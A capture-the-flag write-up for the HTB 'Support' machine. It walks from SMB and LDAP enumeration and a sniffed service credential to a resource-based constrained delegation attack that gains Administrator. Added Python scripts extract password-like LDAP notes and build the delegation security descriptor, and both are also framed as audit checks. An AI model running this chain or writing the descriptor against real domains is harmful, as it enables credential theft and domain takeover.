Support - HTB - Key Points
October 12, 2022
Target IP: 10.10.11.174
nmap -sS -p- -T4 --min-rate=10000 10.10.11.174
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-12 09:18 CEST
Nmap scan report for 10.10.11.174
Host is up (0.11s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49674/tcp open unknown
49686/tcp open unknown
49700/tcp open unknown
51987/tcp open unknown
nmap -n -sV --script "ldap* and not brute" 10.10.11.174
The LDAP scripts return the naming context DC=support,DC=htb, i.e. the domain support.htb with the domain controller at dc.support.htb (add it to /etc/hosts, the ldapsearch commands below use the hostname).
smbclient -L \\10.10.11.174
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
smbclient -N \\\\10.10.11.174\\support-tools
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D         0  Wed Jul 20 19:01:06 2022
  ..                                  D         0  Sat May 28 13:18:25 2022
  7-ZipPortable_21.07.paf.exe         A   2880728  Sat May 28 13:19:19 2022
  npp.8.4.1.portable.x64.zip          A   5439245  Sat May 28 13:19:55 2022
  putty.exe                           A   1273576  Sat May 28 13:20:06 2022
  SysinternalsSuite.zip               A  48102161  Sat May 28 13:19:31 2022
  UserInfo.exe.zip                    A    277499  Wed Jul 20 19:01:07 2022
  windirstat1_1_2_setup.exe           A     79171  Sat May 28 13:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe   A  44398000  Sat May 28 13:19:43 2022

                4026367 blocks of size 4096. 968536 blocks available

The share is readable over a null session (-N), and UserInfo.exe.zip stands out: it is the only custom tool among off-the-shelf utilities and was added almost two months after the rest.
String analysis of UserInfo.exe in Ghidra shows a hard-coded username, support\ldap, which suggests the tool binds to LDAP with a service account.
I tried launching the executable through wine while monitoring its network activity with Wireshark. The packet capture shows the binary authenticating to LDAP over an unencrypted connection, exposing the credentials in clear text:
support\ldap:nv...mz
We can further enumerate LDAP now.
ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\ldap' -w 'nv...mz' -b "dc=support,dc=htb" "objectclass=user"
This dumps every user object. More useful is restricting the output to the cn and info attributes, since the info and description fields are where administrators tend to leave notes:
ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\ldap' -w 'nv...mz' -b "dc=support,dc=htb" "objectclass=user" cn info
which shows a password contained in a user description:
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
cn: support
info: Ir...ul
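Rather than eyeballing the LDIF for one user, a practitioner would sweep every object for note attributes in one pass. The following Python script is an added example (not part of the original write-up) that parses ldapsearch's LDIF output offline and flags user objects whose info, description or comment attributes contain something credential-like. It handles the two LDIF quirks that hide values from a naive grep: folded continuation lines (a leading space) and base64-encoded values (attr:: ...), which ldapsearch emits whenever a value is not a safe ASCII string, for instance one containing non-ASCII characters or a leading space. The sample LDIF, the account notes and the passwords in it are constructed for the example.

```python
import base64
import re
import sys

# Attributes where administrators commonly leave notes (and, sometimes, passwords).
NOTE_ATTRS = ("info", "description", "comment")

# "attr: value" or "attr:: base64value"; the attribute name ends at the first colon.
LDIF_LINE = re.compile(r"^([\w;.-]+)(::?) ?(.*)$")

# A run of 8+ non-space characters containing both a letter and a digit.
# Crude on purpose: it separates "Built-in account for ..." from "Passw0rd!"-style notes.
SECRET_TOKEN = re.compile(r"(?=\S*\d)(?=\S*[A-Za-z])\S{8,}")

# Constructed sample in the exact shape ldapsearch prints (comments, folded line,
# base64 value, trailing "search result" block). The secrets are made up.
SAMPLE_LDIF = (
    "# extended LDIF\n#\n# LDAPv3\n# base <dc=support,dc=htb> with scope subtree\n"
    "# filter: objectclass=user\n# requesting: cn info description\n#\n\n"
    "# support, Users, support.htb\n"
    "dn: CN=support,CN=Users,DC=support,DC=htb\n"
    "cn: support\n"
    "info: ConstructedPassw0rd!\n\n"
    "# ldap, Users, support.htb\n"
    "dn: CN=ldap,CN=Users,DC=support,DC=htb\n"
    "cn: ldap\n"
    # non-ASCII in the value forces ldapsearch to base64-encode it ("description::")
    "description:: " + base64.b64encode("Temp pw: Constructed1234 (ändern!)".encode()).decode() + "\n\n"
    "# Guest, Users, support.htb\n"
    "dn: CN=Guest,CN=Users,DC=support,DC=htb\n"
    "cn: Guest\n"
    "description: Built-in account for guest access to the computer/domai\n"
    " n\n\n"                                      # folded continuation line
    "# search result\nsearch: 2\nresult: 0 Success\n\n"
    "# numResponses: 4\n# numEntries: 3\n"
)


def parse_ldif(text):
    """Parse ldapsearch LDIF into a list of {attr: [values]} dicts (attr names lower-cased)."""
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:      # continuation of the previous line
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)
    entries, current = [], {}
    for line in unfolded + [""]:                  # trailing "" flushes the last entry
        if not line.strip():
            if "dn" in current:                   # drops the "search: 2 / result: 0" trailer
                entries.append(current)
            current = {}
            continue
        if line.startswith("#"):
            continue
        m = LDIF_LINE.match(line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(attr.lower(), []).append(value)
    return entries


def _name(entry):
    return (entry.get("samaccountname") or entry.get("cn") or entry["dn"])[0]


def note_values(entries):
    """{account: [(attr, value), ...]} for every entry with a non-empty note attribute."""
    hits = {}
    for e in entries:
        found = [(a, v) for a in NOTE_ATTRS for v in e.get(a, []) if v.strip()]
        if found:
            hits[_name(e)] = found
    return hits


def likely_secrets(entries):
    """Subset of note_values() whose value contains a credential-looking token.
    Anything returned here is readable by every authenticated domain user."""
    return {name: [(a, v) for a, v in found if SECRET_TOKEN.search(v)]
            for name, found in note_values(entries).items()
            if any(SECRET_TOKEN.search(v) for _, v in found)}


if __name__ == "__main__":
    # usage: ldapsearch ... > users.ldif; python3 ldif_notes.py users.ldif
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_LDIF
    for name, found in likely_secrets(parse_ldif(text)).items():
        for attr, value in found:
            print(f"{name}: {attr} = {value!r}")
```

Run it over the output of the second ldapsearch above (redirected to a file) and every account whose notes look like a password is listed; the Guest description is parsed but filtered out by the token heuristic, while the base64-encoded and folded values are decoded before matching, which a plain grep on the raw LDIF would miss.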
The support user has remote access rights (WinRM is listening on port 5985), so we can log in with evil-winrm:
*Evil-WinRM* PS C:\Users\support\Documents> cat ..\Desktop\user.txt
65...d9
Run SharpHound on the box and analyze the results in BloodHound.
support is a member of SHARED SUPPORT ACCOUNTS, which has GenericAll on the DC's computer object. The abuse section in BloodHound explains that full control of a computer object lets us write its msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which is the basis of the attack called resource-based constrained delegation (RBCD): we configure an account we control as allowed to delegate to the DC, then use S4U2Self/S4U2Proxy to obtain a service ticket to the DC as any user, including Administrator. The one prerequisite is an account with an SPN whose credentials we know; the default MachineAccountQuota of 10 lets any domain user create a machine account for this purpose.
A page from HackTricks on RBCD helps both in understanding and in performing the attack; follow that guide.
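The heart of the attack is a single attribute write: the value stored in msDS-AllowedToActOnBehalfOfOtherIdentity on the DC's computer object is a binary security descriptor whose DACL names the SID that may act on the DC's behalf. The Python below is an added example (not code from the write-up or from HackTricks) that builds that descriptor the way the usual PowerView/Rubeus one-liner does (owner BUILTIN\Administrators, one full-control ACE with mask 0xF01FF per SID) and parses one back. The parser is also the defensive check: read the attribute from every computer object and list the SIDs it grants, since each of them can request service tickets to that host as arbitrary users. The SID used is a constructed placeholder; on an engagement it is the objectSid of the machine account you created, and the resulting bytes are written with Set-DomainObject or Impacket's rbcd.py.

```python
import struct

# Rights string CCDCLCSWRPWPDTLOCRSDRCWDWO from the SDDL
# "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<SID>)" as a numeric access mask.
FULL_CONTROL = 0x000F01FF
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"   # descriptor owner ("O:BA")

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00
SD_HEADER = "<BBHIIII"   # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
ACL_HEADER = "<BBHHH"    # AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACE_HEADER = "<BBHI"     # AceType, AceFlags, AceSize, Mask


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-5-21-...' as the binary SID structure stored in AD."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"malformed SID: {sid!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")            # IdentifierAuthority is big-endian
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, off: int = 0):
    """Decode a binary SID at buf[off:]; returns (sid_string, bytes_consumed)."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from(f"<{count}I", buf, off + 8)
    return "S-%d-%d%s" % (revision, authority, "".join(f"-{s}" for s in subs)), 8 + 4 * count


def build_rbcd_descriptor(delegating_sids) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR for msDS-AllowedToActOnBehalfOfOtherIdentity:
    owner BUILTIN\\Administrators, no group, no SACL, and a DACL with one
    full-control ACCESS_ALLOWED ACE per SID allowed to act on the target's behalf."""
    owner = sid_to_bytes(BUILTIN_ADMINISTRATORS)
    aces = b""
    for sid in delegating_sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack(ACE_HEADER, ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    acl = struct.pack(ACL_HEADER, ACL_REVISION_DS, 0, 8 + len(aces), len(delegating_sids), 0) + aces
    owner_off = struct.calcsize(SD_HEADER)         # owner SID follows the 20-byte header
    dacl_off = owner_off + len(owner)
    header = struct.pack(SD_HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, owner_off, 0, 0, dacl_off)
    return header + owner + acl


def parse_rbcd_descriptor(blob: bytes):
    """Return [(sid, access_mask)] for each ACCESS_ALLOWED ACE in the DACL.
    Defensive use: feed it the attribute value read from each computer object and
    review the SIDs; each can obtain service tickets to that host as any user via S4U2Proxy."""
    if len(blob) < struct.calcsize(SD_HEADER):
        return []
    revision, _, control, _, _, _, dacl_off = struct.unpack_from(SD_HEADER, blob, 0)
    if revision != 1 or not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from(ACL_HEADER, blob, dacl_off)
    off, grants = dacl_off + struct.calcsize(ACL_HEADER), []
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from(ACE_HEADER, blob, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = sid_from_bytes(blob, off + struct.calcsize(ACE_HEADER))
            grants.append((sid, mask))
        off += ace_size
    return grants


if __name__ == "__main__":
    # Constructed placeholder SID; in practice this is the objectSid of the machine
    # account you control (e.g. Get-DomainComputer FAKE01 | Select objectsid).
    fake_sid = "S-1-5-21-1677581083-3380853377-188903654-5601"
    blob = build_rbcd_descriptor([fake_sid])
    print(blob.hex())                  # bytes to write into the DC$ attribute
    print(parse_rbcd_descriptor(blob)) # [('S-1-5-21-...-5601', 983551)]
```

The descriptor deliberately carries only a DACL: owner and DACL are all the KDC consults when it evaluates S4U2Proxy against the target's attribute. When auditing, an empty result from parse_rbcd_descriptor means nothing is delegated; any SID you did not configure on purpose, in particular a freshly created machine account, is the indicator of this attack.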
The injection through Rubeus did not work for me, so I went a different route.
I exported the ticket and exfiltrated it to my Kali machine, where I converted it from .kirbi to .ccache format with ticket_converter.py.
With this new format we can use the ticket with Impacket's smbexec and achieve command execution as Administrator on the box: point KRB5CCNAME at the .ccache, pass -k -no-pass, and target the DC by its hostname (dc.support.htb) rather than by IP so that the service name in the ticket matches.
C:\Windows\system32>type ..\..\Users\Administrator\Desktop\root.txt
59...43
Merry hacking ;)